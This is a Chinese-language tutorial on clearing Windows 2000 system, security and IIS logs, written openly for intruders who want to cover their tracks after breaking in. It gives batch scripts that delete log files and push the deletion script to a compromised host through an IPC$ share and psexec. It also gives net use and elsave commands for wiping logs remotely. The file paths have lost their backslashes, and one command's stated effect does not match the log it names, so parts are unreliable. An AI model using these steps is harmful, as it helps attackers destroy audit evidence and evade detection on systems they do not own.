徹底清除本地和遠程系統(tǒng)日志文件

什么是日志文件？它是一些文件系統(tǒng)集合，依靠建立起的各種數(shù)據(jù)的日志文件而存在。在任何系統(tǒng)發(fā)生崩潰或需要重新啟動時，數(shù)據(jù)就遵從日志文件中的信息記錄原封不動進行恢復。日志對于系統(tǒng)安全的作用是顯而易見的，無論是網(wǎng)絡管理員還是 黑客都非常重視日志，一個有經(jīng)驗的管理員往往能夠迅速通過日志了解到系統(tǒng)的安全性能，而一個聰明的黑客會在入侵成功后迅速清除掉對自己不利的日志。無論是攻還是防，日志的重要性由此可見。下面我們就來簡單討論一下日志文件的清除方法。

　　一、日志文件的位置

　　Windows 2000的系統(tǒng)日志文件有應用程序日志，安全日志、系統(tǒng)日志、DNS服務器日志等等，應用程序日志、安全日志、系統(tǒng)日志、DNS日志默認位置：%systemroot%system32config。


　　安全日志文件：%systemroot%system32configSecEvent.EVT

　　系統(tǒng)日志文件：%systemroot%system32configSysEvent.EVT

　　應用程序日志文件：%systemroot%system32configAppEvent.EVT


　　有的管理員很可能將這些日志重定位（所以日志可能不在上面那些位置），其中EVENTLOG下面有很多的子表，在里面可查到以上日志的定位目錄。

　　二、清除自己電腦中的日志

　　如果你要清除自己電腦中的日志，可以用管理員的身份來登錄Windows，然后在“控制面板”中進入“管理工具”，再雙擊里面的“事件查看器”。打開后我們就可以在這里清除日志文件了，里面有應用程序、安全和系統(tǒng)日志文件。舉個例子，比方說你想清除安全日志，可以右鍵點擊“安全日志”，在彈出的菜單中選擇“屬性”。接下來在彈出的對話框中，點擊下面“清除日志”按鈕就可以清除了，如果你想以后再來清除這些日志的話，可以將“按需要改寫尺寸”，這樣就可以在達到最大日志尺寸時進行改寫事件了，不會提示你清除日志。

　　三、清除遠程主機上的日志

　　大多數(shù)情況下，IIS的日志會忠實地記錄它接收到的任何請求（也有特殊的不被IIS記錄的攻擊），一個優(yōu)秀的系統(tǒng)管理員會利用這點來發(fā)現(xiàn)入侵的企圖，保護自己的系統(tǒng)。所以如果你是黑客，入侵系統(tǒng)成功后第一件事便是清除日志，擦去自己的形跡，這時可以用以下兩個辦法：一是自己編寫批處理文件來解決，編寫一個能清除日志的批處理非常簡單，方法是：新建一個具有如下內(nèi)容的批處理文件：
@del c:winntsystem32logfiles*.*

　　@del c:winntsystem32config*.evt

　　@del c:winntsystem32dtclog*.*

　　@del c:winntsystem32*.log

　　@del c:winntsystem32*.txt

　　@del c:winnt*.txt

　　@del c:winnt*.log

　　@del c:del.bat


　　把上面的內(nèi)容保存為del.bat備用。在上面的代碼中echo是DOS下的回顯命令，在它的前面加上“@”前綴字符，表示執(zhí)行時本行在命令行或DOS里面不顯示，另外del命令大家一定清楚吧？它是刪除文件命令。


　　接下來再新建一個批處理文件，內(nèi)容如下：

　　@copy del.bat %1c$

　　@echo 向肉雞復制本機的del.bat……OK

　　@psexec %1 c:del.bat

　　@echo 在肉雞上運行del.bat，清除日志文件……OK

　　保存為clean.bat即可，假設已經(jīng)與肉雞進行了IPC連接，然后在CMD下輸入：clean.bat 肉雞IP，即可清除肉雞上的日志文件。

　　清除日志的另外一個方法是借助第三方軟件，如著名黑客軟件流光的開發(fā)者黑客小榕的elsave.exe，就是是一款可以遠程清除系統(tǒng)日志、應用程序日志、安全日志的軟件，大家可以在網(wǎng)上下載到。elsave.exe使用起來很簡單，首先利用獲得的管理員賬號與對方建立IPC會話：net use ip pass /user: user，然后在命令行下執(zhí)行如下命令：elsave -s ip -l application -C，這樣就刪除了安全日志。